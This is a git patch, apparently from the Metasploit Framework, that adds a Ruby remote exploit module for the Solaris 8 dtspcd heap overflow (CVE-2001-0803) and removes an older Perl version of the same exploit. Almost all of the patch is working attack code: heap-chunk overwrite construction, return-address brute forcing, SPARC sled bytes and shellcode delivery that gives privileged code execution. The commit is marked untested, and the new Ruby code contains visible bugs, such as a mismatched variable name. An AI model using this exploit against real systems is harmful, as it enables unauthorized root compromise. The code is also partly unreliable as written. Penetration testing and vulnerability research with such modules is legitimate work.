From 87f23247a56b07d9494d863ccbf40dfd90ed5560 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 27 Dec 2005 05:47:03 +0000 Subject: [PATCH] Moved. Changed. Woop. Not tested git-svn-id: file:///home/svn/incoming/trunk@3261 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/solaris/dtspcd/heap_noir.rb | 140 +++++++++ .../solaris/dtspcd/solaris_dtspcd_noir.rb | 265 ------------------ 2 files changed, 140 insertions(+), 265 deletions(-) create mode 100644 modules/exploits/solaris/dtspcd/heap_noir.rb delete mode 100644 modules/exploits/solaris/dtspcd/solaris_dtspcd_noir.rb diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb new file mode 100644 index 0000000000..190cf3f96c --- /dev/null +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -0,0 +1,140 @@ +require 'msf/core' + +module Msf + +class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Solaris dtspcd Heap Overflow', + 'Description' => %q{ + This is a port of noir's dtspcd exploit. This module should + work against any vulnerable version of Solaris 8 (sparc). + The original exploit code was published in the book + Shellcoder's Handbook. + + }, + 'Author' => [ 'noir ', 'hdm' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '4503'], + [ 'CVE', '2001-0803'], + [ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'], + [ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'], + [ 'MIL', '61'], + + ], + 'Privileged' => true, + 'Payload' => + { + 'Space' => 800, + 'BadChars' => "\x00\x0d", + 'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3), + }, + 'Platform' => 'solaris', + 'Arch' => ARCH_SPARC, + 'Targets' => + [ + ['Solaris 8', + { 'Rets' => + [0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ] + } + ], + ], + 'DisclosureDate' => 'Jul 10 2002', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(6112) + ], self.class) + end + + + def exploit + return if not dtspcd_uname() + + target['Rets'][4].each do |tjmp| + + rbase = target['Rets'][1] + + while (rbase < target['Rets'][2]) do + print_status("Trying 0x%.8x 0x%.8x" % target['Rets'][0] + tjmp, rbase) + attack(target['Rets'][0] + tjmp, rbase, payload.encoded) + attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded) + rbase += target['Rets'][3] + end + end + + handler + disconnect + end + + def check + return Exploit::CheckCode::Detected if dtspcd_uname() + return Exploit::CheckCode::Safe + end + + def dtspcd_uname + spc_connect() + spc_write(spc_register('root', "\x00"), 4) + host, os, ver, arch = spc_read().gsub("\x00", '').split(':') + + return false if not host + + print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware") + spc_write("", 2) + return true + end + + + def chunk_create(retloc, retadd) + "\x12\x12\x12\x12" + + [retaddr].pack('N')+ + "\x23\x23\x23\x23\xff\xff\xff\xff" + + "\x34\x34\x34\x34\x45\x45\x45\x45" + + "\x56\x56\x56\x56" + + [retloc - 8].pack('N') + end + + + def attack(retloc, retadd, fcode) + spc_connect() + + buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - fcode.length) / 8)) + fcode + buf << "\x00\x00\x10\x3e\x00\x00\x00\x14" + buf << "\x12\x12\x12\x12\xff\xff\xff\xff" + buf << "\x00\x00\x0f\xf4" + buf << chunk_create(retloc, retadd) + buf << "X" * ((0x103e - 8) - buf.length) + + spc_write(spc_register("", buf), 4) + sock.get_once(-1) + end + + + def spc_register(user='', buff='') + "4 \x00#{user}\x00\x0010\x00#{buff}" + end + + def spc_write(buff = '', cmd='') + sock.put(sprintf("%08x%02x%04x%04x %s", 2, cmd, buff.length, (@spc_seq += 1), buff)) + end + + def spc_read + # Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq + head = sock.get_once(20) + sock.get_once( head[10, 13].hex ) || '' + end + + def spc_connect + disconnect + connect + @spc_seq = 0 + end + +end +end diff --git a/modules/exploits/solaris/dtspcd/solaris_dtspcd_noir.rb b/modules/exploits/solaris/dtspcd/solaris_dtspcd_noir.rb deleted file mode 100644 index 43afbc762b..0000000000 --- a/modules/exploits/solaris/dtspcd/solaris_dtspcd_noir.rb +++ /dev/null @@ -1,265 +0,0 @@ -require 'msf/core' - -module Msf - -class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote - - include Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Solaris dtspcd Heap Overflow', - 'Description' => %q{ - This is a port of noir's dtspcd exploit. This module should - work against any vulnerable version of Solaris 8 (sparc). - The original exploit code was published in the book - Shellcoder's Handbook. - - }, - 'Author' => [ 'noir ', 'hdm' ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'OSVDB', '4503'], - [ 'CVE', '2001-0803'], - [ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'], - [ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'], - [ 'MIL', '61'], - - ], - 'Privileged' => true, - 'Payload' => - { - 'Space' => 800, - 'BadChars' => "\x00\x0d", - 'PrependEncoder' => "\xa4\x1c\x40\x11\xa4\x1c\x40\x11\xa4\x1c\x40\x11", - - }, - 'Targets' => - [ - [ - 'Automatic Targetting', - { - 'Platform' => 'solaris', - 'Ret' => 0x0, - }, - ], - ], - 'DisclosureDate' => 'Jul 10 2002', - 'DefaultTarget' => 0)) - end - - def exploit - connect - - handler - disconnect - end - -=begin - -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::solaris_dtspcd_noir; -use base "Msf::Exploit"; -use IO::Socket; -use IO::Select; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'Solaris dtspcd Heap Overflow', - 'Version' => '$Revision$', - 'Authors' => - [ - 'noir ', - 'H D Moore ' - ], - - 'Arch' => [ 'sparc' ], - 'OS' => [ 'solaris' ], - 'Priv' => 1, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The dtogin service port', 6112], - }, - - 'Payload' => - { - 'Space' => 800, - 'BadChars' => "\x00\x0d", - 'PrependEncoder' => (pack('N', 0xa41c4011) x 3), - }, - - 'Description' => Pex::Text::Freeform(qq{ - This is a port of noir's dtspcd exploit. This module should work against - any vulnerable version of Solaris 8 (sparc). The original exploit code - was published in the book Shellcoder's Handbook. -}), - - 'Refs' => - [ - ['OSVDB', '4503'], - ['CVE', '2001-0803'], - ['URL', 'http://www.cert.org/advisories/CA-2001-31.html'], - ['URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'], - ['MIL', '61'], - ], - - 'Targets' => - [ - ['Solaris8', 0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ], - ], - - 'Keys' => ['dtspcd'], - - 'DisclosureDate' => 'Jul 10 2002', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Check { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - - if(! $self->get_uname) { - $self->PrintLine("[*] No response from the dtlogin service"); - return $self->CheckCode('Safe'); - } - - # XXX - probe service for crash - return $self->CheckCode('Detected'); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target_idx = $self->GetVar('TARGET'); - my $target = $self->Targets->[ $target_idx ]; - - if(! $self->get_uname) { - $self->PrintLine("[*] No response from the dtlogin service"); - return; - } - - my ($res, $req); - - for my $tjmp ( @{ $target->[5] } ) { - for (my $rbase = $target->[2]; $rbase < $target->[3]; $rbase += $target->[4] ) { - $self->PrintLine("[*] Trying ".sprintf("0x%.8x 0x%.8x", $target->[1] + $tjmp, $rbase)); - return if ! $self->attack($target->[1] + $tjmp, $rbase, $shellcode); - return if ! $self->attack($target->[1] + $tjmp, $rbase + 4, $shellcode); - } - } -} - -sub spc_setup { - my $self = shift; - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $self->GetVar('RHOST'), - 'PeerPort' => $self->GetVar('RPORT'), - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $self->{'SOC'} = $s; - return $s; -} - -sub spc_register { - my ($self, $user, $buff) = @_; - return "4 "."\x00".$user."\x00\x00"."10"."\x00".$buff; -} - -sub spc_write { - my ($self, $buff, $cmd) = @_; - my $req = sprintf("%08x%02x%04x%04x %s", 2, $cmd, length($buff), ++$self->{'SEQ'}, $buff); - return if ! $self->{'SOC'}; - return $self->{'SOC'}->Send($req); -} - -sub spc_read { - my $self = shift; - return if ! $self->{'SOC'}; - my $buff = $self->{'SOC'}->Recv(20, 5); - my $chan = hex(substr($buff, 0, 9)); - my $cmd = hex(substr($buff, 9, 1)); - my $mbl = hex(substr($buff, 10, 4)); - my $seq = hex(substr($buff, 14, 4)); - $buff = $self->{'SOC'}->Recv($mbl, 5); - return $buff; -} - -sub get_uname { - my $self = shift; - return if ! $self->spc_setup; - $self->spc_write($self->spc_register('root', "\x00"), 4); - my $buff = $self->spc_read; - $buff =~ s/\x00//g; - - my ($host, $os, $ver, $arch) = split(/:/, $buff); - return if ! $host; - - $self->PrintLine("[*] Detected dtspcd running $os v$ver on $arch hardware"); - $self->spc_write("", 2); -} - -sub get_chunk { - my ($self, $retloc, $retadd) = @_; - return - "\x12\x12\x12\x12" . pack('N', $retadd). - "\x23\x23\x23\x23\xff\xff\xff\xff". - "\x34\x34\x34\x34\x45\x45\x45\x45". - "\x56\x56\x56\x56" . pack('N', $retloc - 8); -} - -sub attack { - my ($self, $retloc, $retadd, $fcode) = @_; - return if ! $self->spc_setup; - - my $req = "\xa4\x1c\x40\x11\x20\xbf\xff\xff" x ((4096 - 8 - length($fcode)) / 8); - $req .= $fcode . - "\x00\x00\x10\x3e\x00\x00\x00\x14". - "\x12\x12\x12\x12\xff\xff\xff\xff". - "\x00\x00\x0f\xf4". - $self->get_chunk($retloc, $retadd); - - $req .= "A" x ((0x103e - 8) - length($req)); - - $self->spc_write($self->spc_register("", $req), 4); - my $res = $self->{'SOC'}->Recv(-1, 5); - return 1; -} - -1; - -=end - - -end -end